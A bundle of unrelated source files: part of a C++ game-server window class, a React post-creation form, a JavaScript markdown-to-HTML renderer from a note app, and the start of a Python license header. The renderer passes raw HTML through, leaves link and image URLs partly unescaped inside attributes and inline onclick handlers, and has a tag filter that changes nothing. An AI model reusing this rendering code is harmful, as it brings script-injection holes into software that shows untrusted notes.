const AString & GetWindowTitle() const { return m_WindowTitle; }
void SetWindowTitle(const AString & a_WindowTitle) { m_WindowTitle = a_WindowTitle; }
/** Updates a numerical property associated with the window. Typically used for furnace progressbars.
Sends the UpdateWindowProperty packet to all clients of the window */
virtual void SetProperty(short a_Property, short a_Value);
/** Updates a numerical property associated with the window. Typically used for furnace progressbars.
Sends the UpdateWindowProperty packet only to the specified player */
virtual void SetProperty(short a_Property, short a_Value, cPlayer & a_Player);
// tolua_end
void OwnerDestroyed(void);
/** Calls the callback safely for each player that has this window open; returns true if all players have been enumerated */
bool ForEachPlayer(cPlayerListCallback a_Callback);
/** Calls the callback safely for each client that has this window open; returns true if all clients have been enumerated */
bool ForEachClient(cClientHandleCallback a_Callback);
/** Called on shift-clicking to distribute the stack into other areas; Modifies a_ItemStack as it is distributed!
if a_ShouldApply is true, the changes are written into the slots;
if a_ShouldApply is false, only a_ItemStack is modified to reflect the number of fits (for fit-testing purposes) */
virtual void DistributeStack(cItem & a_ItemStack, int a_Slot, cPlayer & a_Player, cSlotArea * a_ClickedArea, bool a_ShouldApply) = 0;
/** Called from DistributeStack() to distribute the stack into a_AreasInOrder; Modifies a_ItemStack as it is distributed!
If a_ShouldApply is true, the changes are written into the slots;
if a_ShouldApply is false, only a_ItemStack is modified to reflect the number of fits (for fit-testing purposes)
If a_BackFill is true, the areas will be filled from the back (right side). (Example: Empty Hotbar -> Item get in slot 8, not slot 0) */
void DistributeStackToAreas(cItem & a_ItemStack, cPlayer & a_Player, cSlotAreas & a_AreasInOrder, bool a_ShouldApply, bool a_BackFill);
/** Called on DblClicking to collect all stackable items from all areas into hand.
The items are accumulated in a_Dragging and removed from the SlotAreas immediately.
If a_CollectFullStacks is false, slots with full stacks in the area are skipped while collecting.
Returns true if full stack has been collected, false if there's space remaining to fill. */
bool CollectItemsToHand(cItem & a_Dragging, cSlotArea & a_Area, cPlayer & a_Player, bool a_CollectFullStacks);
/** Used by cSlotAreas to send individual slots to clients, a_RelativeSlotNum is the slot number relative to a_SlotArea */
void SendSlot(cPlayer & a_Player, cSlotArea * a_SlotArea, int a_RelativeSlotNum);
protected:
cSlotAreas m_SlotAreas;
char m_WindowID;
int m_WindowType;
AString m_WindowTitle;
cCriticalSection m_CS;
cPlayerList m_OpenedBy;
bool m_IsDestroyed;
cWindowOwner * m_Owner;
static Byte m_WindowIDCounter;
/** Sets the internal flag as "destroyed"; notifies the owner that the window is destroying */
virtual void Destroy(void);
/** Returns the correct slot area for the specified window-global SlotNum
Also returns the area-local SlotNum corresponding to the GlobalSlotNum
If the global SlotNum is out of range, returns nullptr */
cSlotArea * GetSlotArea(int a_GlobalSlotNum, int & a_LocalSlotNum);
/** Returns the correct slot area for the specified window-global SlotNum
Also returns the area-local SlotNum corresponding to the GlobalSlotNum
If the global SlotNum is out of range, returns nullptr.
Const version. */
const cSlotArea * GetSlotArea(int a_GlobalSlotNum, int & a_LocalSlotNum) const;
/** Prepares the internal structures for inventory painting from the specified player */
void OnPaintBegin(cPlayer & a_Player);
/** Adds the slot to the internal structures for inventory painting by the specified player */
void OnPaintProgress(cPlayer & a_Player, int a_SlotNum);
/** Processes the entire action stored in the internal structures for inventory painting; distributes as many items as possible */
void OnLeftPaintEnd(cPlayer & a_Player);
/** Processes the entire action stored in the internal structures for inventory painting; distributes one item into each slot */
void OnRightPaintEnd(cPlayer & a_Player);
/** Processes the entire action stored in the internal structures for inventory painting; distributes a full stack into each slot */
void OnMiddlePaintEnd(cPlayer & a_Player);
/** Distributes a_NumToEachSlot items into the slots specified in a_SlotNums; returns the total number of items distributed.
@param a_LimitItems if false, no checks are performed on a_Item.m_ItemCount. */
int DistributeItemToSlots(cPlayer & a_Player, const cItem & a_Item, int a_NumToEachSlot, const cSlotNums & a_SlotNums, bool a_LimitItems = true);
} ; // tolua_export
|
import React, { useState } from "react";
import axios from "axios";
import filterOptions from "../assets/data/filterOptions";
import createPostSettings from "../assets//data/createPostSettings";
import CustomModal from "../components/CreatePost/CustomModal";
import RadioGroup from "../components/CreatePost/RadioGroup";
import CustomH1 from "../components/Typography/Title/CustomH1";
import DownArrowButton from "../components/Button/DownArrowButton";
import HorizontalLine from "../components/Icon/horizontal-line";
import AddTags from "../components/Tag/AddTags";
import SubmitButton from "../components/Button/SubmitButton";
import { theme } from "../constants/theme";
import {
CreatePostWrapper,
StyledForm,
StyledInput,
StyledTextArea,
} from "../components/CreatePost/StyledCreatePost";
const types = Object.values(filterOptions)[2].options;
const { shareWith, expires, helpTypes } = createPostSettings;
const initialState = {
state: {
modal: false,
options: [],
selected: "",
},
formData: {
title: "",
description: "",
tags: [],
shareWith: shareWith.default.value,
expires: expires.default.value,
help: helpTypes.default.value,
},
errors: [],
};
const errorMsg = {
title: "Please include a title for your post.",
description: "Please include a description for your post.",
help: "Please select a type of help.",
tags: "Please add at least one tag.",
};
export default (props) => {
const [state, setState] = useState(initialState.state);
const [formData, setFormData] = useState(initialState.formData);
const [errors, setErrors] = useState(initialState.errors);
const { modal, selected, options } = state;
const showModal = (setting) => (e) => {
setState({
...state,
modal: !state.modal,
options: setting.options,
selected: setting.type,
});
};
const closeModal = (e) => {
setState({
...state,
modal: !state.modal,
options: [],
selected: "",
});
};
const handleFormData = (field) => (e) => {
setFormData({ ...formData, [field]: e.target.value });
if (errors.includes(field) && formData[field]) {
const newErrors = errors.filter((error) => error !== field);
setErrors(newErrors);
}
};
const addTag = (tag) => (e) => {
const hasTag = formData.tags.includes(tag);
if (hasTag) {
const tags = formData.tags.filter((t) => t !== tag);
setFormData({ ...formData, tags });
} else {
setFormData({ ...formData, tags: [...formData.tags, tag] });
}
};
const populateErrors = () => {
const newErrors = [];
for (let field in errorMsg) {
if (!errors.includes(field)) {
newErrors.push(field);
}
}
setErrors([...errors, ...newErrors]);
};
const renderError = (field) => {
if (errors.includes(field) && (!formData[field] || !formData[field].length))
return errorMsg[field];
};
const handleSubmit = async (e) => {
e.preventDefault();
populateErrors();
if (!errors.length) {
// todo: finish integrating api
try {
const req = await axios.post("/api/posts", formData);
} catch (error) {
console.log(error);
}
}
};
return (
<CreatePostWrapper>
<CustomH1
className="title"
fontsize="2.2rem"
fontweight="700"
color="black"
>
Create a Post
</CustomH1>
<StyledForm onSubmit={handleSubmit}>
<div className="settings">
<CustomModal
title={selected ? createPostSettings[selected].title : ""}
className="post-modal"
content={
<RadioGroup
flex={true}
padding="1.3rem 0"
onChange={handleFormData(selected)}
options={options}
value={formData[selected]}
defaultValue={formData[selected]}
/>
}
onClose={closeModal}
visible={modal}
closable={false}
/>
<div className="buttons">
<DownArrowButton
handleClick={showModal(shareWith)}
label={formData.shareWith}
color={theme.colors.royalBlue}
bgcolor="#fff"
long="true"
/>
<DownArrowButton
handleClick={showModal(expires)}
label={formData.expires}
color={theme.colors.royalBlue}
bgcolor="#fff"
long="true"
/>
</div>
<div className="inline">
<RadioGroup
onChange={handleFormData("help")}
options={helpTypes.options}
value={formData.help}
padding="0"
/>
<span className="error-box">{renderError("help")}</span>
</div>
</div>
<HorizontalLine />
<div className="post-content">
<label>
<StyledInput
onChange={handleFormData("title")}
value={formData.title}
placeholder="Title"
className="title"
/>
</label>
<span className="error-box">{renderError("title")}</span>
<label>
<StyledTextArea
onChange={handleFormData("description")}
value={formData.description}
placeholder="Write a post."
rows={12}
/>
</label>
<span className="error-box">{renderError("description")}</span>
</div>
<HorizontalLine />
<div className="tags">
<AddTags addTag={addTag} filters={types} />
</div>
<span className="error-box">{renderError("tags")}</span>
<SubmitButton
title="Post"
handleClick={handleSubmit}
className="submit-btn"
/>
</StyledForm>
</CreatePostWrapper>
);
};
|
const MarkdownIt = require('markdown-it');
const Entities = require('html-entities').AllHtmlEntities;
const htmlentities = (new Entities()).encode;
const Resource = require('lib/models/Resource.js');
const ObjectUtils = require('lib/ObjectUtils');
const { shim } = require('lib/shim.js');
const { _ } = require('lib/locale');
const md5 = require('md5');
const MdToHtml_Katex = require('lib/MdToHtml_Katex');
const StringUtils = require('lib/string-utils.js');
class MdToHtml {
constructor(options = null) {
if (!options) options = {};
this.loadedResources_ = {};
this.cachedContent_ = null;
this.cachedContentKey_ = null;
// Must include last "/"
this.resourceBaseUrl_ = ('resourceBaseUrl' in options) ? options.resourceBaseUrl : null;
}
makeContentKey(resources, body, style, options) {
let k = [];
for (let n in resources) {
if (!resources.hasOwnProperty(n)) continue;
const r = resources[n];
k.push(r.id);
}
k.push(md5(escape(body))); // https://github.com/pvorb/node-md5/issues/41
k.push(md5(JSON.stringify(style)));
k.push(md5(JSON.stringify(options)));
return k.join('_');
}
clearCache() {
this.cachedContent_ = null;
this.cachedContentKey_ = null;
}
renderAttrs_(attrs) {
if (!attrs) return '';
let output = [];
for (let i = 0; i < attrs.length; i++) {
const n = attrs[i][0];
const v = attrs[i].length >= 2 ? attrs[i][1] : null;
if (n === 'alt' && !v) {
continue;
} else if (n === 'src') {
output.push('src="' + htmlentities(v) + '"');
} else {
output.push(n + '="' + (v ? htmlentities(v) : '') + '"');
}
}
return output.join(' ');
}
getAttr_(attrs, name, defaultValue = null) {
for (let i = 0; i < attrs.length; i++) {
if (attrs[i][0] === name) return attrs[i].length > 1 ? attrs[i][1] : null;
}
return defaultValue;
}
setAttr_(attrs, name, value) {
for (let i = 0; i < attrs.length; i++) {
if (attrs[i][0] === name) {
attrs[i][1] = value;
return attrs;
}
}
attrs.push([name, value]);
return attrs;
}
async loadResource(id, options) {
// Initially set to to an empty object to make
// it clear that it is being loaded. Otherwise
// it sometimes results in multiple calls to
// loadResource() for the same resource.
this.loadedResources_[id] = {};
const resource = await Resource.load(id);
if (!resource) {
// Can happen for example if an image is attached to a note, but the resource hasn't
// been downloaded from the sync target yet.
console.info('Cannot load resource: ' + id);
delete this.loadedResources_[id];
return;
}
const localState = await Resource.localState(resource);
if (localState.fetch_status !== Resource.FETCH_STATUS_DONE) {
delete this.loadedResources_[id];
console.info('Resource not yet fetched: ' + id);
return;
}
this.loadedResources_[id] = resource;
if (options.onResourceLoaded) options.onResourceLoaded();
}
renderImage_(attrs, options) {
const title = this.getAttr_(attrs, 'title');
const href = this.getAttr_(attrs, 'src');
if (!Resource.isResourceUrl(href)) {
return '<img data-from-md title="' + htmlentities(title) + '" src="' + href + '"/>';
}
const resourceId = Resource.urlToId(href);
const resource = this.loadedResources_[resourceId];
if (!resource) {
this.loadResource(resourceId, options);
return '';
}
if (!resource.id) return ''; // Resource is being loaded
const mime = resource.mime ? resource.mime.toLowerCase() : '';
if (Resource.isSupportedImageMimeType(mime)) {
let src = './' + Resource.filename(resource);
if (this.resourceBaseUrl_ !== null) src = this.resourceBaseUrl_ + src;
let output = '<img data-from-md data-resource-id="' + resource.id + '" title="' + htmlentities(title) + '" src="' + src + '"/>';
return output;
}
return '[Image: ' + htmlentities(resource.title) + ' (' + htmlentities(mime) + ')]';
}
renderImageHtml_(before, src, after, options) {
const resourceId = Resource.urlToId(src);
const resource = this.loadedResources_[resourceId];
if (!resource) {
this.loadResource(resourceId, options);
return '';
}
if (!resource.id) return ''; // Resource is being loaded
const mime = resource.mime ? resource.mime.toLowerCase() : '';
if (Resource.isSupportedImageMimeType(mime)) {
let newSrc = './' + Resource.filename(resource);
if (this.resourceBaseUrl_ !== null) newSrc = this.resourceBaseUrl_ + newSrc;
let output = '<img ' + before + ' data-resource-id="' + resource.id + '" src="' + newSrc + '" ' + after + '/>';
return output;
}
return '[Image: ' + htmlentities(resource.title) + ' (' + htmlentities(mime) + ')]';
}
renderOpenLink_(attrs, options) {
let href = this.getAttr_(attrs, 'href');
const text = this.getAttr_(attrs, 'text');
const isResourceUrl = Resource.isResourceUrl(href);
const title = isResourceUrl ? this.getAttr_(attrs, 'title') : href;
let resourceIdAttr = "";
let icon = "";
let hrefAttr = '#';
if (isResourceUrl) {
const resourceId = Resource.pathToId(href);
href = "joplin://" + resourceId;
resourceIdAttr = "data-resource-id='" + resourceId + "'";
icon = '<span class="resource-icon"></span>';
} else {
// If the link is a plain URL (as opposed to a resource link), set the href to the actual
// link. This allows the link to be exported too when exporting to PDF.
hrefAttr = href;
}
const js = options.postMessageSyntax + "(" + JSON.stringify(href) + "); return false;";
let output = "<a data-from-md " + resourceIdAttr + " title='" + htmlentities(title) + "' href='" + hrefAttr + "' onclick='" + js + "'>" + icon;
return output;
}
renderCloseLink_(attrs, options) {
return '</a>';
}
rendererPlugin_(language) {
if (!language) return null;
if (!this.rendererPlugins_) {
this.rendererPlugins_ = {};
this.rendererPlugins_['katex'] = new MdToHtml_Katex();
}
return language in this.rendererPlugins_ ? this.rendererPlugins_[language] : null;
}
parseInlineCodeLanguage_(content) {
const m = content.match(/^\{\.([a-zA-Z0-9]+)\}/);
if (m && m.length >= 2) {
const language = m[1];
return {
language: language,
newContent: content.substr(language.length + 3),
};
}
return null;
}
urldecode_(str) {
try {
return decodeURIComponent((str+'').replace(/\+/g, '%20'));
} catch (error) {
// decodeURIComponent can throw if the string contains non-encoded data (for example "100%")
// so in this case just return the non encoded string.
return str;
}
}
renderTokens_(markdownIt, tokens, options) {
let output = [];
let previousToken = null;
let anchorAttrs = [];
let extraCssBlocks = {};
let anchorHrefs = [];
for (let i = 0; i < tokens.length; i++) {
let t = tokens[i];
const nextToken = i < tokens.length ? tokens[i+1] : null;
let tag = t.tag;
let openTag = null;
let closeTag = null;
let attrs = t.attrs ? t.attrs : [];
let tokenContent = t.content ? t.content : '';
const isCodeBlock = tag === 'code' && t.block;
const isInlineCode = t.type === 'code_inline';
const codeBlockLanguage = t && t.info ? t.info : null;
let rendererPlugin = null;
let rendererPluginOptions = { tagType: 'inline' };
let linkHref = null;
if (isCodeBlock) rendererPlugin = this.rendererPlugin_(codeBlockLanguage);
if (isInlineCode) {
openTag = null;
} else if (tag && (t.type.indexOf('html_inline') >= 0 || t.type.indexOf('html_block') >= 0)) {
openTag = null;
} else if (tag && t.type.indexOf('_open') >= 0) {
openTag = tag;
} else if (tag && t.type.indexOf('_close') >= 0) {
closeTag = tag;
} else if (tag && t.type.indexOf('inline') >= 0) {
openTag = tag;
} else if (t.type === 'link_open') {
openTag = 'a';
} else if (isCodeBlock) {
if (rendererPlugin) {
openTag = null;
} else {
openTag = 'pre';
}
}
if (openTag) {
if (openTag === 'a') {
anchorAttrs.push(attrs);
anchorHrefs.push(this.getAttr_(attrs, 'href'));
output.push(this.renderOpenLink_(attrs, options));
} else {
const attrsHtml = this.renderAttrs_(attrs);
output.push('<' + openTag + (attrsHtml ? ' ' + attrsHtml : '') + '>');
}
}
if (isCodeBlock) {
const codeAttrs = ['code'];
if (!rendererPlugin) {
if (codeBlockLanguage) codeAttrs.push(t.info); // t.info contains the language when the token is a codeblock
output.push('<code class="' + codeAttrs.join(' ') + '">');
}
} else if (isInlineCode) {
const result = this.parseInlineCodeLanguage_(tokenContent);
if (result) {
rendererPlugin = this.rendererPlugin_(result.language);
tokenContent = result.newContent;
}
if (!rendererPlugin) {
output.push('<code class="inline-code">');
}
}
if (t.type === 'math_inline' || t.type === 'math_block') {
rendererPlugin = this.rendererPlugin_('katex');
rendererPluginOptions = { tagType: t.type === 'math_block' ? 'block' : 'inline' };
}
if (rendererPlugin) {
rendererPlugin.loadAssets().catch((error) => {
console.warn('MdToHtml: Error loading assets for ' + rendererPlugin.name() + ': ', error.message);
});
}
if (t.type === 'image') {
if (tokenContent) attrs.push(['title', tokenContent]);
output.push(this.renderImage_(attrs, options));
} else if (t.type === 'html_inline' || t.type === 'html_block') {
output.push(t.content);
} else if (t.type === 'softbreak') {
output.push('<br/>');
} else if (t.type === 'hardbreak') {
output.push('<br/>');
} else if (t.type === 'hr') {
output.push('<hr/>');
} else {
if (t.children) {
const parsedChildren = this.renderTokens_(markdownIt, t.children, options);
output = output.concat(parsedChildren);
} else {
if (tokenContent) {
if ((isCodeBlock || isInlineCode) && rendererPlugin) {
output = rendererPlugin.processContent(output, tokenContent, isCodeBlock ? 'block' : 'inline');
} else if (rendererPlugin) {
output = rendererPlugin.processContent(output, tokenContent, rendererPluginOptions.tagType);
} else {
output.push(htmlentities(tokenContent));
}
}
}
}
if (nextToken && nextToken.tag === 'li' && t.tag === 'p') {
closeTag = null;
} else if (t.type === 'link_close') {
closeTag = 'a';
} else if (tag && t.type.indexOf('inline') >= 0) {
closeTag = openTag;
} else if (isCodeBlock) {
if (!rendererPlugin) closeTag = openTag;
}
if (isCodeBlock) {
if (!rendererPlugin) {
output.push('</code>');
}
} else if (isInlineCode) {
if (!rendererPlugin) {
output.push('</code>');
}
}
if (closeTag) {
if (closeTag === 'a') {
const currentAnchorAttrs = anchorAttrs.pop();
// NOTE: Disabled for now due to this:
// https://github.com/laurent22/joplin/issues/318#issuecomment-375854848
// const previousContent = output.length ? output[output.length - 1].trim() : '';
// const anchorHref = this.getAttr_(currentAnchorAttrs, 'href', '').trim();
// Optimisation: If the content of the anchor is the same as the URL, we replace the content
// by (Link). This is to shorten the text, which is important especially when the note comes
// from imported HTML, which can contain many such links and make the text unreadble. An example
// would be a movie review that has multiple links to allow a user to rate the film from 1 to 5 stars.
// In the original page, it might be rendered as stars, via CSS, but in the imported note it would look like this:
// http://example.com/rate/1 http://example.com/rate/2 http://example.com/rate/3
// http://example.com/rate/4 http://example.com/rate/5
// which would take a lot of screen space even though it doesn't matter since the user is unlikely
// to rate the film from the note. This is actually a nice example, still readable, but there is way
// worse that this in notes that come from web-clipped content.
// With this change, the links will still be preserved but displayed like
// (link) (link) (link) (link) (link)
// if (this.urldecode_(previousContent) === htmlentities(this.urldecode_(anchorHref))) {
// output.pop();
// output.push(_('(Link)'));
// }
output.push(this.renderCloseLink_(currentAnchorAttrs, options));
} else {
output.push('</' + closeTag + '>');
}
}
if (rendererPlugin) {
const extraCss = rendererPlugin.extraCss();
const name = rendererPlugin.name();
if (extraCss && !(name in extraCssBlocks)) {
extraCssBlocks[name] = extraCss;
}
}
previousToken = t;
}
// Insert the extra CSS at the top of the HTML
if (!ObjectUtils.isEmpty(extraCssBlocks)) {
const temp = ['<style>'];
for (let n in extraCssBlocks) {
if (!extraCssBlocks.hasOwnProperty(n)) continue;
temp.push(extraCssBlocks[n]);
}
temp.push('</style>');
output = temp.concat(output);
}
return output.join('');
}
applyHighlightedKeywords_(body, keywords) {
if (!keywords.length) return body;
return StringUtils.surroundKeywords(keywords, body, '<span class="highlighted-keyword">', '</span>');
}
render(body, style, options = null) {
if (!options) options = {};
if (!options.postMessageSyntax) options.postMessageSyntax = 'postMessage';
if (!options.paddingBottom) options.paddingBottom = '0';
if (!options.highlightedKeywords) options.highlightedKeywords = [];
const cacheKey = this.makeContentKey(this.loadedResources_, body, style, options);
if (this.cachedContentKey_ === cacheKey) return this.cachedContent_;
const md = new MarkdownIt({
breaks: true,
linkify: true,
html: true,
});
body = this.applyHighlightedKeywords_(body, options.highlightedKeywords);
// Add `file:` protocol in linkify to allow text in the format of "file://..." to translate into
// file-URL links in html view
md.linkify.add('file:', {
validate: function (text, pos, self) {
var tail = text.slice(pos);
if (!self.re.file) {
// matches all local file URI on Win/Unix/MacOS systems including reserved characters in some OS (i.e. no OS specific sanity check)
self.re.file = new RegExp('^[\\/]{2,3}[\\S]+');
}
if (self.re.file.test(tail)) {
return tail.match(self.re.file)[0].length;
}
return 0;
}
});
// enable file link URLs in MarkdownIt. Keeps other URL restrictions of MarkdownIt untouched.
// Format [link name](file://...)
md.validateLink = function (url) {
var BAD_PROTO_RE = /^(vbscript|javascript|data):/;
var GOOD_DATA_RE = /^data:image\/(gif|png|jpeg|webp);/;
// url should be normalized at this point, and existing entities are decoded
var str = url.trim().toLowerCase();
return BAD_PROTO_RE.test(str) ? (GOOD_DATA_RE.test(str) ? true : false) : true;
}
// This is currently used only so that the $expression$ and $$\nexpression\n$$ blocks are translated
// to math_inline and math_block blocks. These blocks are then processed directly with the Katex
// library. It is better this way as then it is possible to conditionally load the CSS required by
// Katex and use an up-to-date version of Katex (as of 2018, the plugin is still using 0.6, which is
// buggy instead of 0.9).
md.use(require('markdown-it-katex'));
// Hack to make checkboxes clickable. Ideally, checkboxes should be parsed properly in
// renderTokens_(), but for now this hack works. Marking it with HORRIBLE_HACK so
// that it can be removed and replaced later on.
const HORRIBLE_HACK = true;
if (HORRIBLE_HACK) {
let counter = -1;
while (body.indexOf('- [ ]') >= 0 || body.indexOf('- [X]') >= 0 || body.indexOf('- [x]') >= 0) {
body = body.replace(/- \[(X| |x)\]/, function(v, p1) {
let s = p1 == ' ' ? 'NOTICK' : 'TICK';
counter++;
return '- mJOPmCHECKBOXm' + s + 'm' + counter + 'm';
});
}
}
const env = {};
const tokens = md.parse(body, env);
let renderedBody = this.renderTokens_(md, tokens, options);
// console.info(body);
// console.info(tokens);
// console.info(renderedBody);
if (HORRIBLE_HACK) {
let loopCount = 0;
while (renderedBody.indexOf('mJOPm') >= 0) {
renderedBody = renderedBody.replace(/mJOPmCHECKBOXm([A-Z]+)m(\d+)m/, function(v, type, index) {
const js = options.postMessageSyntax + "('checkboxclick:" + type + ':' + index + "'); this.classList.contains('tick') ? this.classList.remove('tick') : this.classList.add('tick'); return false;";
return '<a data-from-md href="#" onclick="' + js + '" class="checkbox ' + (type == 'NOTICK' ? '' : 'tick') + '"><span>' + '' + '</span></a>';
});
if (loopCount++ >= 9999) break;
}
}
renderedBody = renderedBody.replace(/<img(.*?)src=["'](.*?)["'](.*?)\/>/g, (v, before, src, after) => {
if (!Resource.isResourceUrl(src)) return '<img ' + before + ' src="' + src + '" ' + after + '/>';
return this.renderImageHtml_(before, src, after, options);
});
// To disable meta tags that would refresh the page - eg "<meta http-equiv="refresh" content="5; url=/">"
// Also disable a few other tags that are likely not meant to be rendered.
// https://github.com/laurent22/joplin/issues/769
renderedBody = renderedBody.replace(/<(meta|title|body|html|script)/, '<$1');
// https://necolas.github.io/normalize.css/
const normalizeCss = `
html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}
article,aside,footer,header,nav,section{display:block}h1{font-size:2em;margin:.67em 0}hr{box-sizing:content-box;height:0;overflow:visible}
pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent;-webkit-text-decoration-skip:objects}
b,strong{font-weight:bolder}small{font-size:80%}img{border-style:none}
`;
const fontFamily = 'sans-serif';
const css = `
body {
font-size: ` + style.htmlFontSize + `;
color: ` + style.htmlColor + `;
line-height: ` + style.htmlLineHeight + `;
background-color: ` + style.htmlBackgroundColor + `;
font-family: ` + fontFamily + `;
padding-bottom: ` + options.paddingBottom + `;
/* So that, for example, highlighted text or background images are printed too, otherwise browsers tend not to print these things */
-webkit-print-color-adjust: exact;
}
p, h1, h2, h3, h4, h5, h6, ul, table {
margin-top: 0;
margin-bottom: 14px;
}
h1 {
font-size: 1.5em;
font-weight: bold;
}
h2 {
font-size: 1.2em;
font-weight: bold;
}
h3, h4, h5, h6 {
font-size: 1em;
font-weight: bold;
}
a {
color: ` + style.htmlLinkColor + `
}
ul {
padding-left: 1.3em;
}
li p {
margin-bottom: 0;
}
.resource-icon {
display: inline-block;
position: relative;
top: .5em;
text-decoration: none;
width: 1.15em;
height: 1.5em;
margin-right: 0.4em;
background-color: ` + style.htmlColor + `;
/* Awesome Font file */
-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1536 1892' xmlns='http://www.w3.org/2000/svg'><path d='M288 128C129 128 0 257 0 416v960c0 159 129 288 288 288h960c159 0 288-129 288-288V416c0-159-129-288-288-288H288zm449.168 236.572l263.434.565 263.431.562.584 73.412.584 73.412-42.732 1.504c-23.708.835-47.002 2.774-52.322 4.36-14.497 4.318-23.722 12.902-29.563 27.51l-5.12 12.802-1.403 291.717c-1.425 295.661-1.626 302.586-9.936 343.043-15.2 74-69.604 150.014-142.197 198.685-58.287 39.08-121.487 60.47-208.155 70.45-22.999 2.648-122.228 2.636-141.976-.024l-.002.006c-69.785-9.377-108.469-20.202-154.848-43.332-85.682-42.73-151.778-116.991-177.537-199.469-10.247-32.81-11.407-40.853-11.375-78.754.026-31.257.76-39.15 5.024-54.043 8.94-31.228 20.912-51.733 43.56-74.62 27.312-27.6 55.812-40.022 95.524-41.633 37.997-1.542 63.274 5.024 87.23 22.66 15.263 11.235 30.828 33.238 39.537 55.884 5.52 14.355 5.949 18.31 7.549 69.569 1.675 53.648 3.05 63.99 11.674 87.785 11.777 32.499 31.771 55.017 61.46 69.22 26.835 12.838 47.272 16.785 80.56 15.56 21.646-.798 30.212-2.135 43.208-6.741 38.682-13.708 70.96-44.553 86.471-82.635 16.027-39.348 15.995-38.647 15.947-361.595-.042-283.26-.09-286.272-4.568-296.153-10.958-24.171-22.488-28.492-81.074-30.377l-42.969-1.38v-147.95z'/></svg>");
}
a.checkbox {
display: inline-block;
position: relative;
top: .5em;
text-decoration: none;
width: 1.65em; /* Need to cut a bit the right border otherwise the SVG will display a black line */
height: 1.7em;
margin-right: .3em;
background-color: ` + style.htmlColor + `;
/* Awesome Font square-o */
-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1792 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1312 256h-832q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113v-832q0-66-47-113t-113-47zm288 160v832q0 119-84.5 203.5t-203.5 84.5h-832q-119 0-203.5-84.5t-84.5-203.5v-832q0-119 84.5-203.5t203.5-84.5h832q119 0 203.5 84.5t84.5 203.5z'/></svg>");
}
a.checkbox.tick {
left: .1245em; /* square-o and check-square-o aren't exactly aligned so add this extra gap to align them */
/* Awesome Font check-square-o */
-webkit-mask: url("data:image/svg+xml;utf8,<svg viewBox='0 0 1792 1792' xmlns='http://www.w3.org/2000/svg'><path d='M1472 930v318q0 119-84.5 203.5t-203.5 84.5h-832q-119 0-203.5-84.5t-84.5-203.5v-832q0-119 84.5-203.5t203.5-84.5h832q63 0 117 25 15 7 18 23 3 17-9 29l-49 49q-10 10-23 10-3 0-9-2-23-6-45-6h-832q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113v-254q0-13 9-22l64-64q10-10 23-10 6 0 12 3 20 8 20 29zm231-489l-814 814q-24 24-57 24t-57-24l-430-430q-24-24-24-57t24-57l110-110q24-24 57-24t57 24l263 263 647-647q24-24 57-24t57 24l110 110q24 24 24 57t-24 57z'/></svg>");
}
table {
border-collapse: collapse;
}
td, th {
border: 1px solid silver;
padding: .5em 1em .5em 1em;
font-size: ` + style.htmlFontSize + `;
color: ` + style.htmlColor + `;
background-color: ` + style.htmlBackgroundColor + `;
font-family: ` + fontFamily + `;
}
hr {
border: none;
border-bottom: 1px solid ` + style.htmlDividerColor + `;
}
img {
max-width: 100%;
height: auto;
}
.inline-code {
border: 1px solid ` + style.htmlCodeBorderColor + `;
background-color: ` + style.htmlCodeColor + `;
padding-right: .2em;
padding-left: .2em;
}
.highlighted-keyword {
background-color: #F3B717;
color: black;
}
/*
This is to fix https://github.com/laurent22/joplin/issues/764
Without this, the tag attached to an equation float at an absoluate position of the page,
instead of a position relative to the container.
*/
.katex-display>.katex>.katex-html {
position: relative;
}
@media print {
body {
height: auto !important;
}
a.checkbox.tick {
/* Checkbox ticks are displayed upside down when printed for some reason */
transform: scaleY(-1);
}
pre {
white-space: pre-wrap;
}
.code, .inline-code {
border: 1px solid #CBCBCB;
}
}
`;
// To style the checkboxes in print when webkit-print-color-adjust is not enabled.
// Keep it there for now in case that CSS parameter needs to be removed.
// a.checkbox {
// border: 1pt solid ` + style.htmlColor + `;
// border-radius: 2pt;
// width: 1em;
// height: 1em;
// line-height: 1em;
// text-align: center;
// top: .4em;
// }
// a.checkbox.tick:after {
// content: "X";
// }
// a.checkbox.tick {
// top: 0;
// left: -0.02em;
// color: ` + style.htmlColor + `;
// }
const styleHtml = '<style>' + normalizeCss + "\n" + css + '</style>';
const output = styleHtml + renderedBody;
this.cachedContent_ = output;
this.cachedContentKey_ = cacheKey;
return this.cachedContent_;
}
toggleTickAt(body, index) {
let counter = -1;
while (body.indexOf('- [ ]') >= 0 || body.indexOf('- [X]') >= 0 || body.indexOf('- [x]') >= 0) {
counter++;
body = body.replace(/- \[(X| |x)\]/, function(v, p1) {
let s = p1 == ' ' ? 'NOTICK' : 'TICK';
if (index == counter) {
s = s == 'NOTICK' ? 'TICK' : 'NOTICK';
}
return '°°JOP°CHECKBOX°' + s + '°°';
});
}
body = body.replace(/°°JOP°CHECKBOX°NOTICK°°/g, '- [ ]');
body = body.replace(/°°JOP°CHECKBOX°TICK°°/g, '- [x]');
return body;
}
handleCheckboxClick(msg, noteBody) {
msg = msg.split(':');
let index = Number(msg[msg.length - 1]);
let currentState = msg[msg.length - 2]; // Not really needed but keep it anyway
return this.toggleTickAt(noteBody, index);
}
}
module.exports = MdToHtml;
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016, ParaTools, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# (1) Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# (2) Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# (3) Neither the name of ParaTools, Inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
